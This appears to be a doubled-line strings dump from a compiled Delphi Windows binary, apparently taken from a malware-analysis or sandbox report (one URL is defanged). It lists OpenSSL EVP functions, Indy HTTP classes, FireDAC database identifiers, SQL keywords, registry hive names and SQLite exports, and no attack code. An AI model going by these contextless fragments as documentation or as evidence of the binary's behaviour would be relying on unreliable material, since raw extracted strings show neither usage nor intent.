EVP_CIPHER_CTX_set_key_length
EVP_CIPHER_CTX_set_key_length
EVP_CIPHER_CTX_rand_key
EVP_CIPHER_CTX_rand_key
EVP_PKEY_type
EVP_PKEY_type
EVP_PKEY_new
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_free
EVP_PKEY_assign
EVP_PKEY_assign
EVP_CIPHER_key_length
EVP_CIPHER_key_length
EVP_CIPHER_CTX_key_length
EVP_CIPHER_CTX_key_length
EVP_PKEY_decrypt_old
EVP_PKEY_decrypt_old
EVP_PKEY_encrypt_old
EVP_PKEY_encrypt_old
EVP_PKEY_id
EVP_PKEY_id
EVP_PKEY_base_id
EVP_PKEY_base_id
EVP_PKEY_bits
EVP_PKEY_bits
EVP_PKEY_size
EVP_PKEY_size
EVP_PKEY_set_type
EVP_PKEY_set_type
EVP_PKEY_set_type_str
EVP_PKEY_set_type_str
EVP_PKEY_get0
EVP_PKEY_get0
EVP_PKEY_set1_RSA
EVP_PKEY_set1_RSA
EVP_PKEY_get1_RSA
EVP_PKEY_get1_RSA
EVP_PKEY_set1_DSA
EVP_PKEY_set1_DSA
EVP_PKEY_get1_DSA
EVP_PKEY_get1_DSA
EVP_PKEY_set1_DH
EVP_PKEY_set1_DH
EVP_PKEY_get1_DH
EVP_PKEY_get1_DH
EVP_PKEY_set1_EC_KEY
EVP_PKEY_set1_EC_KEY
EVP_PKEY_get1_EC_KEY
EVP_PKEY_get1_EC_KEY
d2i_PublicKey
d2i_PublicKey
i2d_PublicKey
i2d_PublicKey
d2i_AutoPrivateKey
d2i_AutoPrivateKey
EVP_PKEY_copy_parameters
EVP_PKEY_copy_parameters
EVP_PKEY_missing_parameters
EVP_PKEY_missing_parameters
EVP_PKEY_save_parameters
EVP_PKEY_save_parameters
EVP_PKEY_cmp_parameters
EVP_PKEY_cmp_parameters
EVP_PKEY_cmp
EVP_PKEY_cmp
EVP_PKEY_print_public
EVP_PKEY_print_public
EVP_PKEY_print_private
EVP_PKEY_print_private
EVP_PKEY_print_params
EVP_PKEY_print_params
EVP_PKEY_get_default_digest_nid
EVP_PKEY_get_default_digest_nid
PKCS5_PBE_keyivgen
PKCS5_PBE_keyivgen
PKCS5_v2_PBE_keyivgen
PKCS5_v2_PBE_keyivgen
EVP_PKEY_asn1_get_count
EVP_PKEY_asn1_get_count
EVP_PKEY_asn1_get0
EVP_PKEY_asn1_get0
EVP_PKEY_asn1_find
EVP_PKEY_asn1_find
EVP_PKEY_asn1_find_str
EVP_PKEY_asn1_find_str
EVP_PKEY_asn1_add0
EVP_PKEY_asn1_add0
EVP_PKEY_asn1_add_alias
EVP_PKEY_asn1_add_alias
EVP_PKEY_asn1_get0_info
EVP_PKEY_asn1_get0_info
EVP_PKEY_get0_asn1
EVP_PKEY_get0_asn1
EVP_PKEY_asn1_new
EVP_PKEY_asn1_new
EVP_PKEY_asn1_copy
EVP_PKEY_asn1_copy
EVP_PKEY_asn1_free
EVP_PKEY_asn1_free
EVP_PKEY_asn1_set_public
EVP_PKEY_asn1_set_public
EVP_PKEY_asn1_set_private
EVP_PKEY_asn1_set_private
EVP_PKEY_asn1_set_param
EVP_PKEY_asn1_set_param
EVP_PKEY_asn1_set_free
EVP_PKEY_asn1_set_free
EVP_PKEY_asn1_set_ctrl
EVP_PKEY_asn1_set_ctrl
EVP_PKEY_meth_find
EVP_PKEY_meth_find
EVP_PKEY_meth_new
EVP_PKEY_meth_new
EVP_PKEY_meth_get0_info
EVP_PKEY_meth_get0_info
EVP_PKEY_meth_copy
EVP_PKEY_meth_copy
EVP_PKEY_meth_free
EVP_PKEY_meth_free
EVP_PKEY_meth_add0
EVP_PKEY_meth_add0
EVP_PKEY_CTX_new
EVP_PKEY_CTX_new
EVP_PKEY_CTX_new_id
EVP_PKEY_CTX_new_id
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_free
EVP_PKEY_CTX_free
EVP_PKEY_CTX_ctrl
EVP_PKEY_CTX_ctrl
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_get_operation
EVP_PKEY_CTX_get_operation
EVP_PKEY_CTX_set0_keygen_info
EVP_PKEY_CTX_set0_keygen_info
EVP_PKEY_new_mac_key
EVP_PKEY_new_mac_key
EVP_PKEY_CTX_set_data
EVP_PKEY_CTX_set_data
EVP_PKEY_CTX_get_data
EVP_PKEY_CTX_get_data
EVP_PKEY_CTX_get0_pkey
EVP_PKEY_CTX_get0_pkey
EVP_PKEY_CTX_get0_peerkey
EVP_PKEY_CTX_get0_peerkey
EVP_PKEY_CTX_set_app_data
EVP_PKEY_CTX_set_app_data
EVP_PKEY_CTX_get_app_data
EVP_PKEY_CTX_get_app_data
EVP_PKEY_sign_init
EVP_PKEY_sign_init
EVP_PKEY_sign
EVP_PKEY_sign
EVP_PKEY_verify_init
EVP_PKEY_verify_init
EVP_PKEY_verify
EVP_PKEY_verify
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover
EVP_PKEY_verify_recover
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt
EVP_PKEY_encrypt
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt
EVP_PKEY_decrypt
EVP_PKEY_derive_init
EVP_PKEY_derive_init
EVP_PKEY_derive_set_peer
EVP_PKEY_derive_set_peer
EVP_PKEY_derive
EVP_PKEY_derive
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen
EVP_PKEY_paramgen
EVP_PKEY_keygen_init
EVP_PKEY_keygen_init
EVP_PKEY_keygen
EVP_PKEY_keygen
EVP_PKEY_CTX_set_cb
EVP_PKEY_CTX_set_cb
EVP_PKEY_CTX_get_cb
EVP_PKEY_CTX_get_cb
EVP_PKEY_CTX_get_keygen_info
EVP_PKEY_CTX_get_keygen_info
EVP_PKEY_meth_set_init
EVP_PKEY_meth_set_init
EVP_PKEY_meth_set_copy
EVP_PKEY_meth_set_copy
EVP_PKEY_meth_set_cleanup
EVP_PKEY_meth_set_cleanup
EVP_PKEY_meth_set_paramgen
EVP_PKEY_meth_set_paramgen
EVP_PKEY_meth_set_keygen
EVP_PKEY_meth_set_keygen
EVP_PKEY_meth_set_sign
EVP_PKEY_meth_set_sign
EVP_PKEY_meth_set_verify
EVP_PKEY_meth_set_verify
EVP_PKEY_meth_set_verify_recover
EVP_PKEY_meth_set_verify_recover
EVP_PKEY_meth_set_signctx
EVP_PKEY_meth_set_signctx
EVP_PKEY_meth_set_verifyctx
EVP_PKEY_meth_set_verifyctx
EVP_PKEY_meth_set_encrypt
EVP_PKEY_meth_set_encrypt
EVP_PKEY_meth_set_decrypt
EVP_PKEY_meth_set_decrypt
EVP_PKEY_meth_set_derive
EVP_PKEY_meth_set_derive
EVP_PKEY_meth_set_ctrl
EVP_PKEY_meth_set_ctrl
sslvrfFailIfNoPeerCert
sslvrfFailIfNoPeerCert
AMsg
AMsg
TCallbackExEvent
TCallbackExEvent
TPasswordEvent
TPasswordEvent
TPasswordEventEx
TPasswordEventEx
VPassword
VPassword
Certificate
Certificate
RootCertFile
RootCertFile
CertFile
CertFile
KeyFile
KeyFile
OnGetPassword
OnGetPassword
OnGetPasswordExpbV
OnGetPasswordExpbV
EIdOSSLLoadingRootCertError
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
EIdOSSLLoadingKeyError
Open SSL Support DLL Delphi and C Builder interface
Open SSL Support DLL Delphi and C Builder interface
hXXp://VVV.indyproject.org/
hXXp://VVV.indyproject.org/
1993 - 2014
1993 - 2014
secur32.dll
secur32.dll
security.dll
security.dll
TIdHTTPOption
TIdHTTPOption
hoNoParseMetaHTTPEquiv
hoNoParseMetaHTTPEquiv
IdHTTP
IdHTTP
TIdHTTPOptions
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPProtocolVersion
IdHTTP$
IdHTTP$
TIdHTTPOnRedirectEvent
TIdHTTPOnRedirectEvent
TIdHTTPOnHeadersAvailable
TIdHTTPOnHeadersAvailable
TIdHTTPResponse
TIdHTTPResponse
TIdHTTPResponseP
TIdHTTPResponseP
TIdHTTPRequest
TIdHTTPRequest
TIdHTTPProtocol,
TIdHTTPProtocol,
TIdCustomHTTP
TIdCustomHTTP
TIdCustomHTTP,
TIdCustomHTTP,
TIdHTTP,
TIdHTTP,
TIdHTTPh
TIdHTTPh
HTTPOptions
HTTPOptions
EIdHTTPProtocolException
EIdHTTPProtocolException
application/x-www-form-urlencoded
application/x-www-form-urlencoded
HTTP/1.0 200 OK
HTTP/1.0 200 OK
HTTP/
HTTP/
\\.\Scsi%d:
\\.\Scsi%d:
1.0.4
1.0.4
$URL$
$URL$
JclBase$URL$
JclBase$URL$
JCL\source\windows
JCL\source\windows
Windows-1252
Windows-1252
ole32.dll
ole32.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ccIDSBinaryOperator
ccIDSBinaryOperator
ccIDSTrinaryOperator
ccIDSTrinaryOperator
ccJoinControl
ccJoinControl
Mathematical Operators
Mathematical Operators
Supplemental Mathematical Operators
Supplemental Mathematical Operators
Transport And Map Symbols
Transport And Map Symbols
TRootKey
TRootKey
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_DYN_DATA
EJclMutexError
EJclMutexError
TJclIntfCriticalSection$URL$
TJclIntfCriticalSection$URL$
TUnitVersioning$URL$
TUnitVersioning$URL$
!"#$%&*;@[]^_`{|}
!"#$%&*;@[]^_`{|}
EInvalidGraphicOperation
EInvalidGraphicOperation
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
uxtheme.dll
uxtheme.dll
MAPI32.DLL
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeywordP
HelpKeywordP
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
AutoHotkeysh9[
AutoHotkeysh9[
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview\@[
KeyPreview\@[
WindowState
WindowState
OnKeyDown
OnKeyDown
OnKeyPress
OnKeyPress
OnKeyUp
OnKeyUp
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
%s %s
%s %s
(%s%s)
(%s%s)
-%s%s
-%s%s
%s-%s
%s-%s
%s%s-
%s%s-
-%s %s
-%s %s
%s %s-
%s %s-
%s -%s
%s -%s
(%s- %s)
(%s- %s)
(%s %s)
(%s %s)
TSQLTimeStampVariantType
TSQLTimeStampVariantType
TSQLTimeStampData
TSQLTimeStampData
SqlTimSt
SqlTimSt
coInKey
coInKey
IADStanAsyncOperation
IADStanAsyncOperation
ftParadoxOle
ftParadoxOle
upWhereKeyOnly
upWhereKeyOnly
pfInKey
pfInKey
ImportedConstraint
ImportedConstraint
LookupKeyFields
LookupKeyFields
KeyFields
KeyFields
TSQLTimeStampField
TSQLTimeStampField
SQLTimeStamp
SQLTimeStamp
%s: %s
%s: %s
%s.%s
%s.%s
supports
supports
importNode
importNode
%s="%s"
%s="%s"
%s%s%s: %d%s%s
%s%s%s: %d%s%s
TADSQLTimeIntervalKind
TADSQLTimeIntervalKind
uADStanSQLTimeInt
uADStanSQLTimeInt
TADSQLTimeIntervalData
TADSQLTimeIntervalData
TADSQLTimeIntervalDataDr_
TADSQLTimeIntervalDataDr_
TADSQLTimeIntervalVariantType
TADSQLTimeIntervalVariantType
Cannot perform operation on non initialized interval value
Cannot perform operation on non initialized interval value
%u-%.2u
%u-%.2u
%u %.2u:%.2u:%.2u
%u %.2u:%.2u:%.2u
%u:%.2u:%.2u
%u:%.2u:%.2u
[%s] is not a valid interval
[%s] is not a valid interval
TADGUIxLoginHistoryStorage
TADGUIxLoginHistoryStorage
TADGUIxLoginDialogEvent
TADGUIxLoginDialogEvent
IADGUIxLoginDialog
IADGUIxLoginDialog
gcrSQLWait
gcrSQLWait
IADGUIxAsyncExecuteDialog
IADGUIxAsyncExecuteDialog
rvCmdExecMode
rvCmdExecMode
rvCmdExecTimeout
rvCmdExecTimeout
rvDirectExecute
rvDirectExecute
xoIfCmdsInactive
xoIfCmdsInactive
CmdExecMode
CmdExecMode
CmdExecTimeout
CmdExecTimeout
DirectExecute
DirectExecute
%sP%uY
%sP%uY
%sP%uM
%sP%uM
%sP%uD
%sP%uD
%sT%uH
%sT%uH
%sT%uM
%sT%uM
%sT%uS%uF
%sT%uS%uF
%sP%uY%uM
%sP%uY%uM
%sP%uDT%uH
%sP%uDT%uH
%sP%uDT%uH%uM
%sP%uDT%uH%uM
%sP%uDT%uH%uM%uS%uF
%sP%uDT%uH%uM%uS%uF
%sT%uH%uM
%sT%uH%uM
%sT%uH%uM%uS%uF
%sT%uH%uM%uS%uF
%sT%uM%uS%uF
%sT%uM%uS%uF
TADThreadMsgBase
TADThreadMsgBase
TADThreadStartMsg
TADThreadStartMsg
TADThreadStopMsg
TADThreadStopMsg
TADThreadTerminateMsg
TADThreadTerminateMsg
Failed to %s thread [%s].
Failed to %s thread [%s].
Timeout [%d] expired
Timeout [%d] expired
System error: %s
System error: %s
delphi32.exe
delphi32.exe
\StringFileInfo\%s\FileDescription
\StringFileInfo\%s\FileDescription
\StringFileInfo\%s\FileVersion
\StringFileInfo\%s\FileVersion
\StringFileInfo\%s\LegalCopyright
\StringFileInfo\%s\LegalCopyright
\StringFileInfo\%s\Comments
\StringFileInfo\%s\Comments
atPLSQLTable
atPLSQLTable
InKey
InKey
rsImportingCurent
rsImportingCurent
rsImportingOriginal
rsImportingOriginal
rsImportingProposed
rsImportingProposed
TADDatSForeignKeyConstraint
TADDatSForeignKeyConstraint
ChildKeyConstraint
ChildKeyConstraint
ParentKeyConstraint
ParentKeyConstraint
yyyy-mm-dd hh:nn:ss.zzz
yyyy-mm-dd hh:nn:ss.zzz
skExecute
skExecute
MSSQL
MSSQL
MYSQL
MYSQL
SQLITE
SQLITE
POSTGRESQL
POSTGRESQL
MySQL
MySQL
SQLite
SQLite
TADGUIxAsyncExecuteDialog
TADGUIxAsyncExecuteDialog
TADGUIxLoginDialog
TADGUIxLoginDialog
Object factory for class %s%s is missing
Object factory for class %s%s is missing
Class [%s] does not implement interface [%s]
Class [%s] does not implement interface [%s]
MSSQL2000
MSSQL2000
MSSQL2005
MSSQL2005
%s%s=%s%s%s%s
%s%s=%s%s%s%s
%s%s=%s%s
%s%s=%s%s
Password=*****
Password=*****
NewPassword
NewPassword
NewPassword=*****
NewPassword=*****
ADConnectionDefs.ini
ADConnectionDefs.ini
TADStanAsyncExecutor
TADStanAsyncExecutor
Uh%Ud
Uh%Ud
ARow.Table.Name
ARow.Table.Name
TADIndexes
TADIndexes
TADSQLTimeIntervalField
TADSQLTimeIntervalField
UpdateOptions.KeyFields
UpdateOptions.KeyFields
UpdateOptions.AutoIncFields
UpdateOptions.AutoIncFields
FSortView.SortingMechanism
FSortView.SortingMechanism
LocateRecord(AKeyFields)
LocateRecord(AKeyFields)
PSGetKeyFields
PSGetKeyFields
(SQLTimeInterval)
(SQLTimeInterval)
HistoryWithPassword\
HistoryWithPassword\
HistoryKeyd,P
HistoryKeyd,P
LoginRetries
LoginRetries
ChangeExpiredPassword
ChangeExpiredPassword
OnLogin
OnLogin
OnChangePasswordU
OnChangePasswordU
TADConnectionLoginEvent
TADConnectionLoginEvent
TADExecuteErrorEvent
TADExecuteErrorEvent
LoginDialog
LoginDialog
LoginPrompt
LoginPrompt
BeforeExecute
BeforeExecute
AfterExecute
AfterExecute
TADLocalSQLDataSet
TADLocalSQLDataSet
TADLocalSQLDataSets
TADLocalSQLDataSets
TADLocalSQLDataSetsP
TADLocalSQLDataSetsP
TADCustomLocalSQL
TADCustomLocalSQL
Indexes
Indexes
IndexesActive
IndexesActive
BeforeExecuteX
BeforeExecuteX
AfterExecuteX
AfterExecuteX
LocalSQL
LocalSQL
OnExecuteError
OnExecuteError
TADCustomCommand.Prepare
TADCustomCommand.Prepare
TADCustomCommand.Prepare - Exception
TADCustomCommand.Prepare - Exception
TADCustomCommand.Unprepare
TADCustomCommand.Unprepare
TADCustomCommand.Unprepare - Exception
TADCustomCommand.Unprepare - Exception
TADCustomCommand.InternalClose
TADCustomCommand.InternalClose
TADCustomCommand.InternalClose - Exception
TADCustomCommand.InternalClose - Exception
TADCustomCommand.InternalOpenFinished - Exception
TADCustomCommand.InternalOpenFinished - Exception
TADCustomCommand.InternalOpenFinished
TADCustomCommand.InternalOpenFinished
TADCustomCommand.InternalOpen
TADCustomCommand.InternalOpen
TADCustomCommand.InternalOpen - Exception
TADCustomCommand.InternalOpen - Exception
TADCustomCommand.InternalExecuteFinished - Exception
TADCustomCommand.InternalExecuteFinished - Exception
TADCustomCommand.InternalExecuteFinished
TADCustomCommand.InternalExecuteFinished
TADCustomCommand.InternalExecute
TADCustomCommand.InternalExecute
TADCustomCommand.InternalExecute - Exception
TADCustomCommand.InternalExecute - Exception
TADCustomCommand.FetchFinished - Exception
TADCustomCommand.FetchFinished - Exception
TADCustomCommand.FetchFinished
TADCustomCommand.FetchFinished
TADCustomCommand.Fetch
TADCustomCommand.Fetch
TADCustomCommand.Fetch - Exception
TADCustomCommand.Fetch - Exception
TADDefaultLocalSQLAdapter
TADDefaultLocalSQLAdapter
Password must be not empty
Password must be not empty
Invalid password is specified or DB is corrupted
Invalid password is specified or DB is corrupted
Invalid password is specified
Invalid password is specified
Cipher: Password must be not empty
Cipher: Password must be not empty
Cipher: failed to change the DB password
Cipher: failed to change the DB password
;.ud3
;.ud3
~.SWj
~.SWj
~.CB3
~.CB3
ABSOLUTE,ACTION,ADA,ADD,ALL,ALLOCATE,ALTER,AND,ANY,ARE,AS,ASC,ASSERTION,AT,AUTHORIZATION,AVG,BEGIN,BETWEEN,BIT,BIT_LENGTH,BOTH,BY,CASCADE,CASCADED,CASE,CAST,CATALOG,CHAR,CHAR_LENGTH,CHARACTER,CHARACTER_LENGTH,CHECK,CLOSE,COALESCE,COLLATE,COLLATION,COLUMN,COMMIT,CONNECT,CONNECTION,CONSTRAINT,CONSTRAINTS,CONTINUE,CONVERT,CORRESPONDING,COUNT,CREATE,CROSS,CURRENT,CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,CURRENT_USER,CURSOR,DATE,DAY,DEALLOCATE,DEC,DECIMAL,DECLARE,DEFAULT,DEFERRABLE,DEFERRED,DELETE,DESC,DESCRIBE,DESCRIPTOR,DIAGNOSTICS,DISCONNECT,DISTINCT,DOMAIN,DOUBLE,DROP,ELSE,END,END-EXEC,ESCAPE,EXCEPT,EXCEPTION,EXEC,EXECUTE,EXISTS,EXTERNAL,EXTRACT,FALSE,FETCH,FIRST,FLOAT,FOR,FOREIGN,FORTRAN,FOUND,FROM,FULL,GET,GLOBAL,GO,GOTO,GRANT,GROUP,HAVING,HOUR,IDENTITY,IMMEDIATE,IN,INCLUDE,INDEX,INDICATOR,INITIALLY,INNER,INPUT,INSENSITIVE,INSERT,INT,INTEGER,INTERSECT,INTERVAL,INTO,IS,ISOLATION,JOIN,KEY,LANGUAGE,LAST,LEADING,LEFT,LEVEL,LIKE,LOCAL,LOWER,MATCH,MAX,MIN,MINUTE,MODULE,MONTH,NAMES,NATIONAL,NATURAL,NCHAR,NEXT,NO,NONE,NOT,NULL,NULLIF,NUMERIC,OCTET_LENGTH,OF,ON,ONLY,OPEN,OPTION,OR,ORDER,OUTER,OUTPUT,OVERLAPS,PAD,PARTIAL,PASCAL,PLI,POSITION,PRECISION,PREPARE,PRESERVE,PRIMARY,PRIOR,PRIVILEGES,PROCEDURE,PUBLIC,READ,REAL,REFERENCES,RELATIVE,RESTRICT,REVOKE,RIGHT,ROLLBACK,ROWSSCHEMA,SCROLL,SECOND,SECTION,SELECT,SESSION,SESSION_USER,SET,SIZE,SMALLINT,SOME,SPACE,SQL,SQLCA,SQLCODE,SQLERROR,SQLSTATE,SQLWARNING,SUBSTRING,SUM,SYSTEM_USER,TABLE,TEMPORARY,THEN,TIME,TIMESTAMP,TIMEZONE_HOUR,TIMEZONE_MINUTE,TO,TRAILING,TRANSACTION,TRANSLATE,TRANSLATION,TRIM,TRUE,UNION,UNIQUE,UNKNOWN,UPDATE,UPPER,USAGE,USER,USING,VALUE,VALUES,VARCHAR,VARYING,VIEW,WHEN,WHENEVER,WHERE,WITH,WORK,WRITE,YEAR,ZONE
ABSOLUTE,ACTION,ADA,ADD,ALL,ALLOCATE,ALTER,AND,ANY,ARE,AS,ASC,ASSERTION,AT,AUTHORIZATION,AVG,BEGIN,BETWEEN,BIT,BIT_LENGTH,BOTH,BY,CASCADE,CASCADED,CASE,CAST,CATALOG,CHAR,CHAR_LENGTH,CHARACTER,CHARACTER_LENGTH,CHECK,CLOSE,COALESCE,COLLATE,COLLATION,COLUMN,COMMIT,CONNECT,CONNECTION,CONSTRAINT,CONSTRAINTS,CONTINUE,CONVERT,CORRESPONDING,COUNT,CREATE,CROSS,CURRENT,CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,CURRENT_USER,CURSOR,DATE,DAY,DEALLOCATE,DEC,DECIMAL,DECLARE,DEFAULT,DEFERRABLE,DEFERRED,DELETE,DESC,DESCRIBE,DESCRIPTOR,DIAGNOSTICS,DISCONNECT,DISTINCT,DOMAIN,DOUBLE,DROP,ELSE,END,END-EXEC,ESCAPE,EXCEPT,EXCEPTION,EXEC,EXECUTE,EXISTS,EXTERNAL,EXTRACT,FALSE,FETCH,FIRST,FLOAT,FOR,FOREIGN,FORTRAN,FOUND,FROM,FULL,GET,GLOBAL,GO,GOTO,GRANT,GROUP,HAVING,HOUR,IDENTITY,IMMEDIATE,IN,INCLUDE,INDEX,INDICATOR,INITIALLY,INNER,INPUT,INSENSITIVE,INSERT,INT,INTEGER,INTERSECT,INTERVAL,INTO,IS,ISOLATION,JOIN,KEY,LANGUAGE,LAST,LEADING,LEFT,LEVEL,LIKE,LOCAL,LOWER,MATCH,MAX,MIN,MINUTE,MODULE,MONTH,NAMES,NATIONAL,NATURAL,NCHAR,NEXT,NO,NONE,NOT,NULL,NULLIF,NUMERIC,OCTET_LENGTH,OF,ON,ONLY,OPEN,OPTION,OR,ORDER,OUTER,OUTPUT,OVERLAPS,PAD,PARTIAL,PASCAL,PLI,POSITION,PRECISION,PREPARE,PRESERVE,PRIMARY,PRIOR,PRIVILEGES,PROCEDURE,PUBLIC,READ,REAL,REFERENCES,RELATIVE,RESTRICT,REVOKE,RIGHT,ROLLBACK,ROWSSCHEMA,SCROLL,SECOND,SECTION,SELECT,SESSION,SESSION_USER,SET,SIZE,SMALLINT,SOME,SPACE,SQL,SQLCA,SQLCODE,SQLERROR,SQLSTATE,SQLWARNING,SUBSTRING,SUM,SYSTEM_USER,TABLE,TEMPORARY,THEN,TIME,TIMESTAMP,TIMEZONE_HOUR,TIMEZONE_MINUTE,TO,TRAILING,TRANSACTION,TRANSLATE,TRANSLATION,TRIM,TRUE,UNION,UNIQUE,UNKNOWN,UPDATE,UPPER,USAGE,USER,USING,VALUE,VALUES,VARCHAR,VARYING,VIEW,WHEN,WHENEVER,WHERE,WITH,WORK,WRITE,YEAR,ZONE
#INDEXES
#INDEXES
#PRIMARYKEYS
#PRIMARYKEYS
#PRIMARYKEYFIELDS
#PRIMARYKEYFIELDS
#FOREIGNKEYS
#FOREIGNKEYS
#FOREIGNKEYFIELDS
#FOREIGNKEYFIELDS
PKEY_NAME
PKEY_NAME
FKEY_NAME
FKEY_NAME
PKEY_CATALOG_NAME
PKEY_CATALOG_NAME
PKEY_SCHEMA_NAME
PKEY_SCHEMA_NAME
PKEY_TABLE_NAME
PKEY_TABLE_NAME
PKEY_COLUMN_NAME
PKEY_COLUMN_NAME
RESULTSET_KEY
RESULTSET_KEY
RESULTSET_KEY =
RESULTSET_KEY =
ADDrivers.ini
ADDrivers.ini
Table Indexes (
Table Indexes (
Table PKeys (
Table PKeys (
Table PKey Fields (
Table PKey Fields (
Table FKeys (
Table FKeys (
Table FKey Fields (
Table FKey Fields (
foreign key name
foreign key name
ESQLiteNativeException
ESQLiteNativeException
TSQLiteExtension
TSQLiteExtension
TSQLiteExtensionManager
TSQLiteExtensionManager
TSQLiteValue
TSQLiteValue
TSQLiteFuncVar
TSQLiteFuncVar
TSQLiteInput
TSQLiteInput
TSQLiteInputs
TSQLiteInputs
TSQLiteOutput
TSQLiteOutput
TSQLiteFunction$Wo
TSQLiteFunction$Wo
TSQLiteFunctionData
TSQLiteFunctionData
TSQLiteExpressionFunction
TSQLiteExpressionFunction
uADPhysSQLiteWrapper
uADPhysSQLiteWrapper
TSQLiteExpressionFunctionData
TSQLiteExpressionFunctionData
sqlite3_libversion
sqlite3_libversion
sqlite3_libversion_number
sqlite3_libversion_number
sqlite3_compileoption_used
sqlite3_compileoption_used
sqlite3_compileoption_get
sqlite3_compileoption_get
sqlite3_initialize
sqlite3_initialize
sqlite3_shutdown
sqlite3_shutdown
sqlite3_close
sqlite3_close
sqlite3_errcode
sqlite3_errcode
sqlite3_errmsg
sqlite3_errmsg
sqlite3_extended_result_codes
sqlite3_extended_result_codes
sqlite3_open
sqlite3_open
sqlite3_open_v2
sqlite3_open_v2
sqlite3_key
sqlite3_key
sqlite3_rekey
sqlite3_rekey
sqlite3_trace
sqlite3_trace
sqlite3_profile
sqlite3_profile
sqlite3_busy_timeout
sqlite3_busy_timeout
sqlite3_get_autocommit
sqlite3_get_autocommit
sqlite3_set_authorizer
sqlite3_set_authorizer
sqlite3_update_hook
sqlite3_update_hook
sqlite3_limit
sqlite3_limit
sqlite3_changes
sqlite3_changes
sqlite3_total_changes
sqlite3_total_changes
sqlite3_interrupt
sqlite3_interrupt
sqlite3_last_insert_rowid
sqlite3_last_insert_rowid
sqlite3_enable_shared_cache
sqlite3_enable_shared_cache
sqlite3_release_memory
sqlite3_release_memory
sqlite3_soft_heap_limit
sqlite3_soft_heap_limit
sqlite3_status
sqlite3_status
sqlite3_malloc
sqlite3_malloc
sqlite3_memory_used
sqlite3_memory_used
sqlite3_memory_highwater
sqlite3_memory_highwater
sqlite3_prepare
sqlite3_prepare
sqlite3_finalize
sqlite3_finalize
sqlite3_step
sqlite3_step
sqlite3_reset
sqlite3_reset
sqlite3_column_count
sqlite3_column_count
sqlite3_column_type
sqlite3_column_type
sqlite3_column_name
sqlite3_column_name
sqlite3_column_database_name
sqlite3_column_database_name
sqlite3_column_table_name
sqlite3_column_table_name
sqlite3_column_origin_name
sqlite3_column_origin_name
sqlite3_column_decltype
sqlite3_column_decltype
sqlite3_column_blob
sqlite3_column_blob
sqlite3_column_double
sqlite3_column_double
sqlite3_column_int64
sqlite3_column_int64
sqlite3_column_text
sqlite3_column_text
sqlite3_column_bytes
sqlite3_column_bytes
sqlite3_clear_bindings
sqlite3_clear_bindings
sqlite3_bind_parameter_count
sqlite3_bind_parameter_count
sqlite3_bind_parameter_index
sqlite3_bind_parameter_index
sqlite3_bind_parameter_name
sqlite3_bind_parameter_name
sqlite3_bind_blob
sqlite3_bind_blob
sqlite3_bind_double
sqlite3_bind_double
sqlite3_bind_int64
sqlite3_bind_int64
sqlite3_bind_null
sqlite3_bind_null
sqlite3_bind_text
sqlite3_bind_text
sqlite3_bind_value
sqlite3_bind_value
sqlite3_bind_zeroblob
sqlite3_bind_zeroblob
sqlite3_value_type
sqlite3_value_type
sqlite3_value_blob
sqlite3_value_blob
sqlite3_value_bytes
sqlite3_value_bytes
sqlite3_value_double
sqlite3_value_double
sqlite3_value_int64
sqlite3_value_int64
sqlite3_value_text
sqlite3_value_text
sqlite3_result_blob
sqlite3_result_blob
sqlite3_result_double
sqlite3_result_double
sqlite3_result_error
sqlite3_result_error
sqlite3_result_error_code
sqlite3_result_error_code
sqlite3_result_int64
sqlite3_result_int64
sqlite3_result_null
sqlite3_result_null
sqlite3_result_text
sqlite3_result_text
sqlite3_result_zeroblob
sqlite3_result_zeroblob
sqlite3_create_collation
sqlite3_create_collation
sqlite3_create_function
sqlite3_create_function
sqlite3_user_data
sqlite3_user_data
sqlite3_enable_load_extension
sqlite3_enable_load_extension
sqlite3_load_extension
sqlite3_load_extension
sqlite3_free
sqlite3_free
sqlite3_table_column_metadata
sqlite3_table_column_metadata
sqlite3_progress_handler
sqlite3_progress_handler
sqlite3_declare_vtab
sqlite3_declare_vtab
sqlite3_create_module
sqlite3_create_module
sqlite3_create_module_v2
sqlite3_create_module_v2
sqlite3_vfs_find
sqlite3_vfs_find
sqlite3_vfs_register
sqlite3_vfs_register
sqlite3_vfs_unregister
sqlite3_vfs_unregister
sqlite3_backup_init
sqlite3_backup_init
sqlite3_backup_step
sqlite3_backup_step
sqlite3_backup_finish
sqlite3_backup_finish
sqlite3_backup_remaining
sqlite3_backup_remaining
sqlite3_backup_pagecount
sqlite3_backup_pagecount
sqlite3_wal_hook
sqlite3_wal_hook
